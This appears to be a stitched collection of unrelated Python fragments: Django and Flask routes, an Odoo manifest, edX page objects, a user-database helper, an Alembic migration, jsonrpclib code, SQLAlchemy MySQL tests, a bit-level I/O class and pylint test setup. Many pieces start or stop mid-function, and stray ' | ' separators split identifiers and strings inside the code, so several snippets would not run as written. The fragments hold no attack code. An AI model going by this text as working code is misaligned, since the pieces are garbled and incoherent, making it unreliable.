#url(r'^change-poc/(?P<ids>\w+)$', 'change_poc', name='maps_change_poc'),
)
|
# Copyright 2019-2020 Camptocamp SA
# Copyright 2015 Mathias Neef copadoMEDIA UG
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
"name": "Switzerland Country States",
"category": "Localisation",
"summary": "",
"version": "14.0.1.0.0",
"author": "copado MEDIA UG," "Odoo Community Associ | ation (OCA)",
"websi | te": "https://github.com/OCA/l10n-switzerland",
"license": "AGPL-3",
"depends": ["base"],
"data": ["data/res_country_states.xml"],
}
|
le
def bookmark_button_visible(self):
""" Check if bookmark button is visible """
EmptyPromise(lambda: self.q(css='.bookmark-button').visible, "Bookmark button visible").fulfill()
return True
@property
def bookmark_button_state(self):
""" Return `bookmarked` if button is in bookmarked state else '' """
return 'bookmarked' if self.q(css='.bookmark-button.bookmarked').present else ''
@property
def bookmark_icon_visible(self):
""" Check if bookmark icon is visible on active sequence nav item """
return self.q(css='.active .bookmark-icon').visible
def click_bookmark_unit_button(self):
""" Bookmark a unit by clicking on Bookmark button """
previous_state = self.bookmark_button_state
self.q(css | ='.bookmark-button').first.click()
EmptyPromise(lambda: self.bookmark_button_state != previous_state, "Bookmark button toggled").fulfill()
# TODO: TNL-6546: Remove this helper function
def click_bookmarks_button(self):
""" Click on Bookmarks button """
self.q(css='.bookmarks-list-button').first.click()
bookmarks_page = BookmarksPage(self.browser, self.course_id)
bookm | arks_page.visit()
class CoursewareSequentialTabPage(CoursePage):
"""
Courseware Sequential page
"""
def __init__(self, browser, course_id, chapter, subsection, position):
super(CoursewareSequentialTabPage, self).__init__(browser, course_id)
self.url_path = "courseware/{}/{}/{}".format(chapter, subsection, position)
def is_browser_on_page(self):
return self.q(css='nav.sequence-list-wrapper').present
def get_selected_tab_content(self):
"""
return the body of the sequential currently selected
"""
return self.q(css='#seq_content .xblock').text[0]
class CourseNavPage(PageObject):
"""
Handles navigation on the courseware pages, including sequence navigation and
breadcrumbs.
"""
url = None
def __init__(self, browser, parent_page):
super(CourseNavPage, self).__init__(browser)
self.parent_page = parent_page
# TODO: TNL-6546: Remove the following
self.unified_course_view = False
def is_browser_on_page(self):
return self.parent_page.is_browser_on_page
# TODO: TNL-6546: Remove method, outline no longer on courseware page
@property
def sections(self):
"""
Return a dictionary representation of sections and subsections.
Example:
{
'Introduction': ['Course Overview'],
'Week 1': ['Lesson 1', 'Lesson 2', 'Homework']
'Final Exam': ['Final Exam']
}
You can use these titles in `go_to_section` to navigate to the section.
"""
# Dict to store the result
nav_dict = dict()
section_titles = self._section_titles()
# Get the section titles for each chapter
for sec_index, sec_title in enumerate(section_titles):
if len(section_titles) < 1:
self.warning("Could not find subsections for '{0}'".format(sec_title))
else:
# Add one to convert list index (starts at 0) to CSS index (starts at 1)
nav_dict[sec_title] = self._subsection_titles(sec_index + 1)
return nav_dict
@property
def sequence_items(self):
"""
Return a list of sequence items on the page.
Sequence items are one level below subsections in the course nav.
Example return value:
['Chemical Bonds Video', 'Practice Problems', 'Homework']
"""
seq_css = 'ol#sequence-list>li>.nav-item>.sequence-tooltip'
return self.q(css=seq_css).map(self._clean_seq_titles).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def go_to_section(self, section_title, subsection_title):
"""
Go to the section in the courseware.
Every section must have at least one subsection, so specify
both the section and subsection title.
Example:
go_to_section("Week 1", "Lesson 1")
"""
# For test stability, disable JQuery animations (opening / closing menus)
self.browser.execute_script("jQuery.fx.off = true;")
# Get the section by index
try:
sec_index = self._section_titles().index(section_title)
except ValueError:
self.warning("Could not find section '{0}'".format(section_title))
return
# Click the section to ensure it's open (no harm in clicking twice if it's already open)
# Add one to convert from list index to CSS index
section_css = '.course-navigation .chapter:nth-of-type({0})'.format(sec_index + 1)
self.q(css=section_css).first.click()
# Get the subsection by index
try:
subsec_index = self._subsection_titles(sec_index + 1).index(subsection_title)
except ValueError:
msg = "Could not find subsection '{0}' in section '{1}'".format(subsection_title, section_title)
self.warning(msg)
return
# Convert list indices (start at zero) to CSS indices (start at 1)
subsection_css = (
".course-navigation .chapter-content-container:nth-of-type({0}) "
".menu-item:nth-of-type({1})"
).format(sec_index + 1, subsec_index + 1)
# Click the subsection and ensure that the page finishes reloading
self.q(css=subsection_css).first.click()
self._on_section_promise(section_title, subsection_title).fulfill()
def go_to_vertical(self, vertical_title):
"""
Within a section/subsection, navigate to the vertical with `vertical_title`.
"""
# Get the index of the item in the sequence
all_items = self.sequence_items
try:
seq_index = all_items.index(vertical_title)
except ValueError:
msg = "Could not find sequential '{0}'. Available sequentials: [{1}]".format(
vertical_title, ", ".join(all_items)
)
self.warning(msg)
else:
# Click on the sequence item at the correct index
# Convert the list index (starts at 0) to a CSS index (starts at 1)
seq_css = "ol#sequence-list>li:nth-of-type({0})>.nav-item".format(seq_index + 1)
self.q(css=seq_css).first.click()
# Click triggers an ajax event
self.wait_for_ajax()
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _section_titles(self):
"""
Return a list of all section titles on the page.
"""
chapter_css = '.course-navigation .chapter .group-heading'
return self.q(css=chapter_css).map(lambda el: el.text.strip()).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _subsection_titles(self, section_index):
"""
Return a list of all subsection titles on the page
for the section at index `section_index` (starts at 1).
"""
# Retrieve the subsection title for the section
# Add one to the list index to get the CSS index, which starts at one
subsection_css = (
".course-navigation .chapter-content-container:nth-of-type({0}) "
".menu-item a p:nth-of-type(1)"
).format(section_index)
# If the element is visible, we can get its text directly
# Otherwise, we need to get the HTML
# It *would* make sense to always get the HTML, but unfortunately
# the open tab has some child <span> tags that we don't want.
return self.q(
css=subsection_css
).map(
lambda el: el.text.strip().split('\n')[0] if el.is_displayed() else el.get_attribute('innerHTML').strip()
).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _on_section_promise(self, section_title, subsection_title):
"""
Return a `Promise` that is ful |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
db manages interactions with the underlying database
"""
import logging
import random
from sqlalchemy import create_engine, MetaData, Table, Column, String, Date, LargeBinary
from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor
class UserDb:
"""
UserDb provides a set of helper functions over SQLAlchemy
to handle db operations for userservice
"""
def __init__(self, uri, logger=logging):
self.engine = create_engine(uri)
self.logger = logger
self.users_table = Table(
'users',
MetaData(self.engine),
Column('accountid', String, primary_key=True),
Column('username', String, unique=True, nullable=False),
Column('passhash', LargeBinary, nullable=False),
Column('firstname', String, nullable=False),
Column('lastname', String, nullable=False),
Column('birthday', Date, nullable=False),
Column('timezone', String, nullable=False),
Column('address', String, nullable=False),
Column('state', String, nullable=False),
Column('zip', String, nullable=False),
Column('ssn', String, nullable=False),
)
# Se | t up tracing autoinstrumentation for sqlalchemy
SQLAlchemyInstrumentor().instrument(
engine=self.engine,
service='users',
)
def add_user(self, user):
"""Add a user to the database.
Params: u | ser - a key/value dict of attributes describing a new user
{'username': username, 'password': password, ...}
Raises: SQLAlchemyError if there was an issue with the database
"""
statement = self.users_table.insert().values(user)
self.logger.debug('QUERY: %s', str(statement))
with self.engine.connect() as conn:
conn.execute(statement)
def generate_accountid(self):
"""Generates a globally unique alphanumerical accountid."""
self.logger.debug('Generating an account ID')
accountid = None
with self.engine.connect() as conn:
while accountid is None:
accountid = str(random.randint(1e9, (1e10 - 1)))
statement = self.users_table.select().where(
self.users_table.c.accountid == accountid
)
self.logger.debug('QUERY: %s', str(statement))
result = conn.execute(statement).first()
# If there already exists an account, try again.
if result is not None:
accountid = None
self.logger.debug('RESULT: account ID already exists. Trying again')
self.logger.debug('RESULT: account ID generated.')
return accountid
def get_user(self, username):
"""Get user data for the specified username.
Params: username - the username of the user
Return: a key/value dict of user attributes,
{'username': username, 'accountid': accountid, ...}
or None if that user does not exist
Raises: SQLAlchemyError if there was an issue with the database
"""
statement = self.users_table.select().where(self.users_table.c.username == username)
self.logger.debug('QUERY: %s', str(statement))
with self.engine.connect() as conn:
result = conn.execute(statement).first()
self.logger.debug('RESULT: fetched user data for %s', username)
return dict(result) if result is not None else None
|
# Copyright 2021 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add device reservation
Revision ID: 42c7fd6e792e
Revises: 02e2f2186d98
Create Date: 2021-06-22 15:27:00.239725
"""
# revision identifiers, used by Alembic.
revision = '42c7fd6e792e'
down_revision = '02e2f2186d98'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('devices',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=False),
sa.Column('device_type',
sa.Enum('container', 'vm', 'shell',
name='allowed_device_types'),
nullable=False),
sa.Column('device_driver', sa.Enum(
'zun', name='allowed_device_drivers'), nullable=False),
sa.Column('reservable', sa.Boolean(),
server_default=sa.text('true'), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('device_extra_capabilities',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('device_id', sa.String(
length=36), nullable=False),
sa.Column('capability_id', sa.String(
length=255), nullable=False),
sa.Column('capability_value', sa.Text().with_variant(
mysql.MEDIUMTEXT(), 'mysql'), nullable=False),
sa.ForeignKeyConstraint(
['capability_id'], ['extra_capabilities.id'], ),
sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('device_allocations',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('deleted', sa.String(length=36), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('device_id', sa.String(
length=36), nullable=True),
sa.Column('reservation_id', sa.String(
length=36), nullable=True),
sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
sa.ForeignKeyConstraint(['reservation_id'], [
'reservations.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('device_reservations',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('deleted', sa.String(length=36), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('reservation_id', sa.String(
length=36), nullable=True),
sa.Column('count_range', sa.String(
length=36), nullable=True),
sa.Column('resource_properties', sa.Text().with_variant(
mysql.MEDIUMTEXT(), 'mysql'), nullable=True),
sa.Column('before_end', sa.String(
length=36), nullable=True),
sa.ForeignKeyConstraint(['reservation_id'], [
'reservations.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.alter_column('instance_reservations', 'affinity',
existing_type=mysql.TINYINT(display_width=1),
nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('inst | ance_reservations', 'affinity',
existing_type=mysql.TINYINT(display_width=1),
nullable=True)
op.drop_table('devi | ce_reservations')
op.drop_table('device_allocations')
op.drop_table('device_extra_capabilities')
op.drop_table('devices')
# ### end Alembic commands ###
|
from django.conf.urls import patterns, include, url
from django.co | ntrib import admin
from api import views
admin.autodiscover()
from res | t_framework.routers import DefaultRouter
router = DefaultRouter()
router.register(r'headings', views.HeadingViewSet)
router.register(r'users', views.UserViewSet)
urlpatterns = patterns('',
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
) |
if self.version >= 2:
del error["result"]
else:
error["result"] = None
error["error"] = {"code": code, "message": message}
if data is not None:
error["error"]["data"] = data
return error
# ------------------------------------------------------------------------------
def dump(
params=None,
methodname=None,
rpcid=None,
version=None,
is_response=None,
is_notify=None,
config=jsonrpclib.config.DEFAULT,
):
"""
Prepares a JSON-RPC dictionary (request, notification, response or error)
:param params: Method parameters (if a method name is given) or a Fault
:param methodname: Method name
:param rpcid: Request ID
:param version: JSON-RPC version
:param is_response: If True, this is a response dictionary
:param is_notify: If True, this is a notification request
:param config: A JSONRPClib Config instance
:return: A JSON-RPC dictionary
"""
# Default version
if not version:
version = config.version
if not is_response and params is None:
params = []
# Validate method name and parameters
valid_params = [utils.TupleType, utils.ListType, utils.DictType, Fault]
if is_response:
valid_params.append(type(None))
if isinstance(methodname, utils.STRING_TYPES) and not isinstance(
params, tuple(valid_params)
):
"""
If a method, and params are not in a listish or a Fault,
error out.
"""
raise TypeError(
"Params must be a dict, list, tuple " "or Fault instance."
)
# Prepares the JSON-RPC content
payload = Payload(rpcid=rpcid, version=version)
if isinstance(params, Fault):
# Prepare an error dictionary
# pylint: disable=E1103
return payload.error(params.faultCode, params.faultString, params.data)
if not isinstance(methodname, utils.STRING_TYPES) and not is_response:
# Neither a request nor a response
raise ValueError(
"Method name must be a string, or is_response "
"must be set to True."
)
if config.use_jsonclass:
# Use jsonclass to convert the parameters
params = jsonclass.dump(params, config=config)
if is_response:
# Prepare a response dictionary
if rpcid is None:
# A response must have a request ID
raise ValueError("A method response must have an rpcid.")
return payload.response(params)
if is_notify:
# Prepare a notification dictionary
return payload.notify(methodname, params)
else:
# Prepare a method call dictionary
return payload.request(methodname, params)
def dumps(
params=None,
methodname=None,
methodresponse=None,
encoding=None,
rpcid=None,
version=None,
notify=None,
config=jsonrpclib.config.DEFAULT,
):
"""
Prepares a JSON-RPC request/response string
:param params: Method parameters (if a method name is given) or a Fault
:param methodname: Method name
:param methodresponse: If True, this is a response dictionary
:param encoding: Result string encoding
:param rpcid: Request ID
:param version: JSON-RPC version
:param notify: If True, this is a notification request
:param config: A JSONRPClib Config instance
:return: A JSON-RPC dictionary
"""
# Prepare the dictionary
request = dump(
params, methodname, rpcid, version, methodresponse, notify, config
)
# Returns it as a JSON string
return jdumps(request, encoding=encoding or "UTF-8")
def load(data, config=jsonrpclib.config.DEFAULT):
"""
Loads a JSON-RPC request/response dictionary. Calls jsonclass to load beans
:param data: A JSON-RPC dictionary
:param config: A JSONRPClib Config instance (or None for default values)
:return: A parsed dictionary or None
"""
if data is None:
# Notification
return None
# if the above raises an error, the implementing server code
# should return something like the following:
# { 'jsonrpc':'2.0', 'error': fault.error(), id: None }
if config.use_jsonclass:
# Convert beans
data = jsonclass.load(data, config.classes)
return data
def loads(data, config=jsonrpclib.config.DEFAULT):
"""
Loads a JSON-RPC request/response string. Calls jsonclass to load beans
:param data: A JSON-RPC string
:param config: A JSONRPClib Config instance (or None for default values)
:return: A parsed dictionary or None
"""
if data == "":
# Notification
return None
# Parse the JSON dictionary
result = jloads(data)
# Load the beans
return load(result, config)
# ------------------------------------------------------------------------------
def check_for_errors(result):
"""
Checks if a result dictionary signals an error
:param result: A result dictionary
:raise TypeError: Invalid parameter
:raise NotImplementedError: Unknown JSON-RPC version
:raise ValueError: Invalid dictionary content
:raise ProtocolError: An error occurred on the server side
:return: The result parameter
"""
if not result:
# Notification
return result
if not isinstance(result, utils.DictType):
# Invalid argument
raise TypeError("Response is not a dict.")
if "jsonrpc" in result and float(result["jsonrpc"]) > 2.0:
# Unknown JSON-RPC version
raise NotImplementedError("JSON-RPC version not yet supported.")
if "result" not in result and "error" not in result:
# Invalid dictionary content
raise ValueError("Response does not have a result or error key.")
if "error" in result and result["error"]:
# Server-side error
if "code" in result["error"]:
# Code + Message
code = result["error"]["code"]
try:
# Get the message (jsonrpclib)
message = result["error"]["message"]
except KeyError:
# Get the trace (jabsorb)
| message = resu | lt["error"].get("trace", "<no error message>")
if -32700 <= code <= -32000:
# Pre-defined errors
# See http://www.jsonrpc.org/specification#error_object
raise ProtocolError((code, message))
else:
# Application error
data = result["error"].get("data", None)
raise AppError((code, message, data))
elif isinstance(result["error"], dict) and len(result["error"]) == 1:
# Error with a single entry ('reason', ...): use its content
error_key = result["error"].keys()[0]
raise ProtocolError(result["error"][error_key])
else:
# Use the raw error content
raise ProtocolError(result["error"])
return result
def isbatch(request):
"""
Tests if the given request is a batch call, i.e. a list of multiple calls
:param request: a JSON-RPC request object
:return: True if the request is a batch call
"""
if not isinstance(request, (utils.ListType, utils.TupleType)):
# Not a list: not a batch call
return False
elif len(request) < 1:
# Only one request: not a batch call
return False
elif not isinstance(request[0], utils.DictType):
# One of the requests is not a dictionary, i.e. a JSON Object
# therefore it is not a valid JSON-RPC request
return False
elif "jsonrpc" not in request[0].keys():
# No "jsonrpc" version in the JSON object: not a request
return False
try:
version = float(request[0]["jsonrpc"])
except ValueError:
# Bad version of JSON-RPC
raise ProtocolError('"jsonrpc" key must be a float(able) value.')
if version < 2:
# Batch call were not supported before JSON-RPC 2.0
return False
return True
def isnotification(request):
"""
Tests if the given request is a notification
:param req |
# ####################################################################
# gofed - set of tools to automize packaging of golang devel codes
# Copyright (C) 2014 Jan Chaloupka, jchaloup@redhat.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ####################################################################
###################################################################
# TODO:
# [ ] - detect more import paths/sources in spec file?
# [ ] - detect from %files every build, analyze its content (downloading it from koji by detecting its name
# from spec file => no koji latest-builds, which packages/builds are no arch, which are arch specific (el6 beast)
# [ ] - all provides of source code import must in a form golang(import_path/...)
# [ ] - what files/provides are optional, which should not be in provides (test files, example, ...)
# [ ] - golang imports of examples are optional
###################################################################
import tempfile
from Utils import runCommand
from SpecParser import SpecParser
from Base import Base
class RemoteSpecParser(Base):
def __init__(self, branch, package):
Base.__init__(self)
self.branch = branch
self.package = package
self.sp_obj = None
def parse(self):
f = tempfile.NamedTemporaryFile(delete=True)
cmd_str = "curl http://pkgs.fedoraproject.org/cgit/rpms/%s.git/plain/%s.spec > %s"
runCommand(cmd_str % (self.package, self.package, f.name))
self.sp_obj = SpecParser(f.name)
if not self.sp_obj.parse():
self.err = self.sp_obj.getError()
f.close()
retu | rn False
f.close()
return True
def getProvides(self):
"""Fetch a spec file from pkgdb and get provides from all its [sub]packages"""
if self.sp_obj == None:
return {}
return self.sp_obj.getProvides()
de | f getPackageCommits(self):
if self.sp_obj == None:
return ""
return self.sp_obj.getMacro("commit")
def getPkgURL(self):
if self.sp_obj == None:
return ""
return self.sp_obj.getTag("url")
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
#
# @author Meng G.
# 2016-03-28 restructed
from sqip.config import *
from sqip.libs import *
dashboard = Blueprint('dashboard', __name__, template_folder='templates')
@base.route('/admin/lo | gin' , methods=['GET'])
@union_bug
def admin_login():
template = env.get_template('login.html')
return template.render()
@base.route('/admin' , methods=['GET'])
@base.route('/admin/< | oath:path>' , methods=['GET'])
@union_bug
def admin():
template = env.get_template('index.html')
return template.render() |
#coding=utf-8
class Quantity:
__counter = 0
def __init__(self):
cls = self.__class__
prefix = cls.__name__
index = cls.__counter
self.storage_name = '_{}#{}'.format(prefix, index)
cls.__counter += 1
def __set__(self, isinstance, value):
if value > 0:
isinstance.__ | dict__[self.storage_name] = value
else:
raise ValueError('value must be > 0')
class LineItem:
weight = Quantity()
price = Quantity()
def __init__(self, description, weight, price):
self.description = description
| self.weight = weight
self.price = price
def subtotal(self):
return self.weight * self.price
|
"key": "/key.pem",
},
"host": "localhost",
"user": "scott",
"port": 3306,
},
)
@testing.combinations(
("compress", True),
("connect_timeout", 30),
("read_timeout", 30),
("write_timeout", 30),
("client_flag", 1234),
("local_infile", 1234),
("use_unicode", False),
("charset", "hello"),
)
def test_normal_arguments_mysqldb(self, kwarg, value):
from sqlalchemy.dialects.mysql import mysqldb
dialect = mysqldb.dialect()
connect_args = dialect.create_connect_args(
make_url(
"mysql://scott:tiger@localhost:3306/test"
"?%s=%s" % (kwarg, value)
)
)
eq_(connect_args[1][kwarg], value)
def test_mysqlconnector_buffered_arg(self):
from sqlalchemy.dialects.mysql import mysqlconnector
dialect = mysqlconnector.dialect()
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db?buffered=true")
)[1]
eq_(kw["buffered"], True)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db?buffered=false")
)[1]
eq_(kw["buffered"], False)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db")
)[1]
eq_(kw["buffered"], True)
def test_mysqlconnector_raise_on_warnings_arg(self):
from sqlalchemy.dialects.mysql import mysqlconnector
dialect = mysqlconnector.dialect()
kw = dialect.create_connect_args(
make_url(
"mysql+mysqlconnector://u:p@host/db?raise_on_warnings=true"
)
)[1]
eq_(kw["raise_on_warnings"], True)
kw = dialect.create_connect_args(
make_url(
"mysql+mysqlconnector://u:p@host/db?raise_on_warnings=false"
)
)[1]
eq_(kw["raise_on_warnings"], False)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db")
)[1]
assert "raise_on_warnings" not in kw
@testing.only_on("mysql")
def test_random_arg(self):
dialect = testing.db.dialect
kw = dialect.create_connect_args(
make_url("mysql://u:p@host/db?foo=true")
)[1]
eq_(kw["foo"], "true")
@testing.only_on("mysql")
@testing.skip_if("mysql+mysqlconnector", "totally broken for the moment")
@testing.fails_on("mysql+oursql", "unsupported")
def test_special_encodings(self):
for enc in ["utf8mb4", "utf8"]:
eng = engines.testing_engine(
options={"connect_args": {"charset": enc, "use_unicode": 0}}
)
conn = eng.connect()
eq_(conn.dialect._connection_charset, enc)
def test_no_show_variables(self):
from sqlalchemy.testing import mock
engine = engines.testing_engine()
def my_execute(self, statement, *args, **kw):
if statement.startswith("SHOW VARIABLES"):
statement = "SELECT 1 FROM DUAL WHERE 1=0"
return real_exec(self, statement, *args, **kw)
real_exec = engine._connection_cls.exec_driver_sql
with mock.patch.object(
engine._connection_cls, "exec_driver_sql", my_execute
):
with expect_warnings(
"Could not retrieve SQL_MODE; please ensure the "
"MySQL user has permissions to | SHOW VARIABLES"
):
engine.connect()
def | test_no_default_isolation_level(self):
from sqlalchemy.testing import mock
engine = engines.testing_engine()
real_isolation_level = testing.db.dialect.get_isolation_level
def fake_isolation_level(connection):
connection = mock.Mock(
cursor=mock.Mock(
return_value=mock.Mock(
fetchone=mock.Mock(return_value=None)
)
)
)
return real_isolation_level(connection)
with mock.patch.object(
engine.dialect, "get_isolation_level", fake_isolation_level
):
with expect_warnings(
"Could not retrieve transaction isolation level for MySQL "
"connection."
):
engine.connect()
def test_autocommit_isolation_level(self):
c = testing.db.connect().execution_options(
isolation_level="AUTOCOMMIT"
)
assert c.exec_driver_sql("SELECT @@autocommit;").scalar()
c = c.execution_options(isolation_level="READ COMMITTED")
assert not c.exec_driver_sql("SELECT @@autocommit;").scalar()
def test_isolation_level(self):
values = [
"READ UNCOMMITTED",
"READ COMMITTED",
"REPEATABLE READ",
"SERIALIZABLE",
]
for value in values:
c = testing.db.connect().execution_options(isolation_level=value)
eq_(testing.db.dialect.get_isolation_level(c.connection), value)
class ParseVersionTest(fixtures.TestBase):
@testing.combinations(
((10, 2, 7), "10.2.7-MariaDB", (10, 2, 7, "MariaDB"), True),
(
(10, 2, 7),
"5.6.15.10.2.7-MariaDB",
(5, 6, 15, 10, 2, 7, "MariaDB"),
True,
),
((10, 2, 10), "10.2.10-MariaDB", (10, 2, 10, "MariaDB"), True),
((5, 7, 20), "5.7.20", (5, 7, 20), False),
((5, 6, 15), "5.6.15", (5, 6, 15), False),
(
(10, 2, 6),
"10.2.6.MariaDB.10.2.6+maria~stretch-log",
(10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log"),
True,
),
(
(10, 1, 9),
"10.1.9-MariaDBV1.0R050D002-20170809-1522",
(10, 1, 9, "MariaDB", "V1", "0R050D002", 20170809, 1522),
True,
),
)
def test_mariadb_normalized_version(
self, expected, raw_version, version, is_mariadb
):
dialect = mysql.dialect()
eq_(dialect._parse_server_version(raw_version), version)
dialect.server_version_info = version
eq_(dialect._mariadb_normalized_version_info, expected)
assert dialect._is_mariadb is is_mariadb
@testing.combinations(
(True, (10, 2, 7, "MariaDB")),
(True, (5, 6, 15, 10, 2, 7, "MariaDB")),
(False, (10, 2, 10, "MariaDB")),
(False, (5, 7, 20)),
(False, (5, 6, 15)),
(True, (10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log")),
)
def test_mariadb_check_warning(self, expect_, version):
dialect = mysql.dialect()
dialect.server_version_info = version
if expect_:
with expect_warnings(
".*before 10.2.9 has known issues regarding "
"CHECK constraints"
):
dialect._warn_for_known_db_issues()
else:
dialect._warn_for_known_db_issues()
class RemoveUTCTimestampTest(fixtures.TablesTest):
"""This test exists because we removed the MySQL dialect's
override of the UTC_TIMESTAMP() function, where the commit message
for this feature stated that "it caused problems with executemany()".
Since no example was provided, we are trying lots of combinations
here.
[ticket:3966]
"""
__only_on__ = "mysql"
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"t",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("data", DateTime),
)
Table(
"t_default",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("idata", DateTime, default=func.utc_timestamp()),
Column("udata", DateTime, onupdate=func.utc_timestamp()),
)
def test_insert_executemany(self):
with testing.db.connect() as conn:
|
# @source http://rosettacode.org/wiki/Bitwise_IO#Python
# @license http://www.gnu.org/licenses/fdl-1.2.html
import logging
logger = logging.getLogger('naabal.util.bitio')
class BitIO(object):
BITS_IN_BYTE = 8
DEFAULT_MASK = 1 << (BITS_IN_BYTE - 1) # 0x80
def __init__(self, handle):
self._data_buffer = handle
self._bit_buffer = 0x00
self._bit_mask = self.DEFAULT_MASK
self._bit_idx = 0
def __enter__(self):
return self
def __exit__(self, type, value, tb):
pass
@property
def index(self):
return self._bit_idx
class BitWriter(BitIO):
def __exit__(self, type, value, tb):
self.flush()
def write_bit(self, bit):
if bit:
self._bit_buffer |= self._bit_mask
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._flush_bit_buffer()
self._reset_state()
def write_bits(self, value, bit_count):
mask = 1 << (bit_count - 1)
while mask != 0:
if mask & value:
| self._bit_buffer |= self._bit_mask
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._flush_bit_buffer()
self._reset_state()
mask = mask >> 1
def flush(self):
| if self._bit_mask != self.DEFAULT_MASK:
self._flush_bit_buffer()
self._reset_state()
return self._bit_idx
def _flush_bit_buffer(self):
self._data_buffer.write(chr(self._bit_buffer))
self._bit_idx += 1
def _reset_state(self):
self._bit_buffer = 0x00
self._bit_mask = self.DEFAULT_MASK
class BitReader(BitIO):
def read_bit(self):
if self._bit_mask == self.DEFAULT_MASK:
self._load_bit_buffer()
value = self._bit_buffer & self._bit_mask
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._bit_mask = self.DEFAULT_MASK
return 1 if value else 0
def read_bits(self, bit_count):
mask = 1 << (bit_count - 1)
bits_value = 0x00
while mask != 0:
if self._bit_mask == self.DEFAULT_MASK:
self._load_bit_buffer()
if self._bit_buffer & self._bit_mask:
bits_value |= mask
mask = mask >> 1
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._bit_mask = self.DEFAULT_MASK
return bits_value
def _load_bit_buffer(self):
c = self._data_buffer.read(1)
if c:
self._bit_buffer = ord(c)
self._bit_idx += 1
else:
raise IOError('Attempted to read past EOF')
|
# Copyright (c) 2003-2008 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ | -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms | of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""functional/non regression tests for pylint"""
import unittest
import sys
import re
import new
from os import linesep
from os.path import exists
from logilab.common import testlib
from utils import get_tests_info, fix_path, TestReporter
from logilab.astng import MANAGER
from pylint.lint import PyLinter
from pylint import checkers
test_reporter = TestReporter()
linter = PyLinter()
linter.set_reporter(test_reporter)
linter.config.persistent = 0
checkers.initialize(linter)
linter.global_set_option('required-attributes', ('__revision__',))
PY23 = sys.version_info >= (2, 3)
PY24 = sys.version_info >= (2, 4)
PY25 = sys.version_info >= (2, 5)
if linesep != '\n':
LINE_RGX = re.compile(linesep)
def ulines(string):
